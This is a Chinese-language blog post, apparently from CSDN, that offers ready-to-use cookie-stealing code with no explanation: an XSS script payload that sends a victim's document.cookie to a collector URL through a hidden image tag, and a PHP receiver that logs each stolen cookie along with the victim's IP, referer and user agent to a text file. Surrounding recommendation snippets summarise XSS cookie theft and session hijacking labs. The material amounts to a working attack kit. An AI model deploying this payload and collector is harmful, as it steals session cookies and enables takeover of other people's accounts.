接收cookie代码与注入盗取cookie代码参考

最新推荐文章于 2023-07-24 20:50:04 发布
最新推荐文章于 2023-07-24 20:50:04 发布
阅读量2k 收藏 5
点赞数
分类专栏: 代码篇 文章标签: cookie 接收代码 插入代码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/longgerlee/article/details/61914134
版权



<script>document.write('<img src="http://127.0.0.1/getcookie.php?cookie='+document.cookie+'"width=0 height=0 border=0 />');alert(/XSS/)</script>




<?php
$cookie = $_GET['cookie']; //以GET方式获取cookie变量值
$ip = getenv ('REMOTE_ADDR'); //远程主机IP地址
$time=date('Y-m-d g:i:s'); //以“年-月-日 时:分:秒”的格式显示时间
$referer=getenv ('HTTP_REFERER'); //链接来源
$agent = $_SERVER['HTTP_USER_AGENT']; //用户浏览器类型
$fp = fopen('cookie.txt', 'a'); //打开cookie.txt,若不存在则创建它
fwrite($fp," IP: " .$ip. "\n Date and Time: " .$time. "\n User Agent:".$agent."\n Referer: ".$referer."\n Cookie: ".$cookie."\n\n\n"); //写入文件
fclose($fp); //关闭文件
?>

雲下闲农
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
js文件Cookie存取值示例代码
12-10
代码如下: /* Cookie工具 使用方法: //存值 var value = “7天”; tools.cookie(“day”,value, {expires:7}); //将字符串:”7天” 以 “day”这个key保存到cookie中5天 //取值 var v = tools.cookie(“day”); //用 “day” 这个key从cookie取出值 */ tools.cookie = function(name, value, options) { if (typeof value != ‘undefined’) { // name and value given, set c
JS操作Cookie写入和读取实例代码
12-08
写入cookie实例! 代码如下: var u = “value=123”; [removed] = u; 读取cookie实例,读取value的值! 代码如下: var c_name=”value”; // 变量名 if ([removed].length > 0) { c_start = [removed].indexOf(c_name + “=”) if (c_start != -1) { c_start = c_start + c_name.length + 1 c_end = [removed].indexOf(“;”, c_st
CTF 中的 PHP 漏洞利用总结
重新启程
10-12 2万+
基础知识 系统变量(超全局变量) 在全部作用域中始终可用的内置变量 1 2 3 4 5 6 7 8 9 $GLOBALS // 引用全局作用域中可用的全部变量 $_POST // 获取 post 数据,是一个字典 $_GET // 获取 get 数据,是一个字典 $_COOKIE // 获取 cookie $_SESSION // 获取 session $...
盗用cookie的目的和防盗cookie的手段
ITWANGBOIT的博客
10-27 9558
前提 虽然通过使用springsecurity我们防御了会话固定攻击,但是如果黑客等待合法用户登录系统之后,再从合法用户浏览器中拿到名字为JSESSIONID的cookie,然后放入黑客自己的浏览器的cookie中,这样以来当黑客带着盗窃来的JSESSIONID访问系统时,后端系统会根据JSESSIONID找到对应的session,就会把该次请求当成是认证通过的用户发送的请求;这样黑客就可以为所欲为了。 实践 如下图: 经过上图的实践,证明我的分析是合理的,只要能拿到认证通过的用户的cook
Fetch的理解和使用
zyz00000000的博客
12-03 5146
Abstract摘要: 1、Fetch的官方规范文档:https://fetch.spec.whatwg.org/ 2、Fetch API提供了一个 JavaScript 接口,优化了http请求和响应的操作方式。这种功能以前是使用XMLHttpRequest(ajax)实现的。它还提供了一个全局fetch()方法,该方法提供了一种简单,合理的方式来跨网络异步获取资源。 3、fetch最大的特点是与Promise对象的结合,Fetch API大多都返回一个Promise对象,使我们的编程风格...
网络安全学习笔记——盗取Cookies跨站脚本(XSS)
最新发布
just do it
07-24 731
使用替换过了的URL发给目标,诱导目标点击,然后目标的cookies就会回弹到XSS攻击平台上,展开就可以看到该目标的PHPSESSID,然后在自己的同源网站上,笔记本按Fn+F12,调出Hackerbar,点击存储,然后把PHPSESSID换成攻击之后得到的,删掉浏览框里面多余的东西,剩下XXX.php即可,刷新之后就会登录该目标的账号——,SESSID——中间键,是Apache分配的,唯一的“身份证”,从SESSID入手,就可以查取用户的相关信息。
黑客是怎么 cookie 获取?钓鱼?键盘记录?
weixin_72959097的博客
06-29 300
修改 C:\xampp\htdocs\pkxss\xcookie 下的 cookie.php,将 IP 地址改为漏洞服务器的地址(这里注意一下因为 xss 后台是可以单独拿出来运行的后台,所以我将 pkxss 后台文件从 pikachu 文件拿出来放在 pikachu 同一目录下)当用户提交的时候,我们就能取得用户的 Cookie, 提交过后页面刷新到 pikachu 的页面这样达到我们想要要求。的后台页面,访问的时候通过 document 中的 cookie 把本地 cookie 的值带过去。
XSS攻击实战
qidiandexiaowu
09-20 474
实验环境:kail虚拟机与本机 先来kail里操作一波 ①开启kail的apache服务,开启命令/etc/init.d/apache2 start 第一步成功了! ②进入/var/www/html/里创建新文件cookie.php,命令:sudo touch cookie.php ③再用vi进行编辑,命令sudo vi cookie.php <?php $cookie = $_GET['cookie']; $ip = getenv ('REMOTE_ADDR'); $time = date('Y-
xss盗取cookie原理剖析
weixin_51692662的博客
10-19 1678
xss盗取cookie
【渗透练习系列】DVWA靶机实战,通过XSS盗取cookie登录-02
书山上的云的博客
03-16 7244
一、发现XSS漏洞 1.1 登录DVWA,找到XSS(DOM)模块,测试XSS是否存在。 1.2 在选项的传参后面加入一串js代码,也就是可以XSS弹出的代码。payload如下: <script>alert(/xss/)</script> 发现可以弹窗,证明此处存在XSS。 二、盗取cookie 2.1 在XSS平台上搭建一个测试项目。这里用的是免费的XSS平台: https://xssaq.com/xss.php 选择【我的项目】->【创建】,创建一个测试项目: 2.2
py-cookieJsInjection:一个从网络嗅探 cookie 并输出可用于将 cookie 注入任何浏览器的 Javascript 代码的 python 脚本
06-03
一个简单的sidejacking工具,使用javascript cookie注入。 该软件会嗅探任何 cookie 接口,并生成可注入任何浏览器的 javascript 代码,方法是将其粘贴到 URL 栏中。 它附带一个脚本: OSx10.6_monitorMode.py ,它能够使用 OS X OSx10.6_monitorMode.py的airport sniff功能,允许将无线设备置于监控模式。 因此,我们能够检索在所选无线信道上发送的任何 cookie。 用法 要运行 cookieJsInjection,请打开一个 shell(例如 bash)并执行以下命令(cookieJsInjection 需要 scapy 才能运行 - ): ./cookieJsInjection.py IFACE 其中IFACE代表您希望嗅探的网络接口(例如 eth0、wlan0 等)。 如果您
用header 发送cookie的php代码
12-17
用header 发送cookie header(“Set-Cookie: testcookie=中文; path=/; domain=.phpv.net; expires=”.gmstrftime(“%A, %d-%b-%Y %H:%M:%S GMT”,time()+9600)); 请将path=/; domain=.phpv.net;改为自己...
利用XSS窃取用户Cookie
Monsterlz123的博客
07-20 6741
【XSS】利用XSS窃取用户Cookie Hello,各位小伙伴周六愉快。 晃眼之间一周又快要过去了,时间是不等人滴~~ 这周准备连发三篇XSS相关内容,两篇实战,一篇总结。 然后XSS漏洞部分就暂时完结啦~~ 今天我们来看看怎么利用XSS窃取用户cookie吧。 一、实验概述 实验拓扑: XSS的用途之一就是窃取用户的cookie,攻击者利用XSS在网站中插入恶意脚本,一旦用户访问该网页...
总结Cookie安全:安全风险和防范建议
Neonline254的博客
05-23 2288
本文从安全工程师的视角总结了Cookie技术和其安全问题,包括Cookie技术的介绍、所带来的安全问题及对应的防范手段和建议,希望能给想了解Cookie安全的你带来一些帮助。
被攻击代码
热门推荐
精哥哥
10-05 3万+
<?php session_start(); $pass = @$_POST['pass'] ; $sv = $_SERVER['HTTP_HOST']; $password = ''; if ($pass == $password) { $_SESSION['barca'] = "$pass"; } if(!isset($_SESSION['barca']) or $_SESSION...
【浏览器地址栏小技巧】浏览器地址栏运行/预览html代码
编程哲学家的专栏
01-27 846
1.地址栏预览html代码 data:text/html,<h1style='color:red'>Hello,world!</h1> 2.浏览器秒变编辑器,可粘贴图片 data:text/html, <html contenteditable> ...
反射型xss钓鱼盗取用户cookie
m0_53820621的博客
01-16 4320
演示用靶场:dvwa
XSS的高级利用:盗取用户Cookie
Zeker62的博客
08-13 1089
XSS不仅仅弹出一个alert就行了,更多的是和其他玩意组合 高级的利用有: 盗取用户Cookie 修改网页内容 网站挂马 利用网站重定向 XSS蠕虫 XSS会话劫持 XSS会话劫持和Cookie有关 Cookie简介: Cookie是一种能够让网站服务器把少量文本数据存储到客户端的硬盘或者内存中,或者是从客户端的硬盘或者内存读取数据的一种技术 因为HTTP协议是无状态的,Web服务器没办法区分请求是否来源于同一个浏览器,因此,web服务器需要额外的数据去维持会话,而Cookie正是这种维持会话的数
利用xss漏洞窃取cookie登录
黑面狐
08-23 1万+
今天在测试自己产品的时候,发现有个地方输入框执行javascript脚本。 正好趁着这个机会给小伙伴们演示xss的危害。 首先在XSS平台上搭建一个测试项目。 我用的是http://xss.fbisb.com这个的免费平台 项目配置选择默认就可以了。 然后直接复制平台提供的代码到存在xss漏洞的地方 保存以后,我让另一个同事登录,并点击这个模块。 这是XSS平
cookie代码放在文件哪里
06-09
如果你是使用第三方的 HTTP 客户端库(如 Apache HttpClient、OkHttp 等),则具体的添加 Cookie 的方式可能会有所不同,需要参考相应的文档和示例代码。 无论你使用哪种方式,都应该将 Cookie 放在请求头部分,而...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值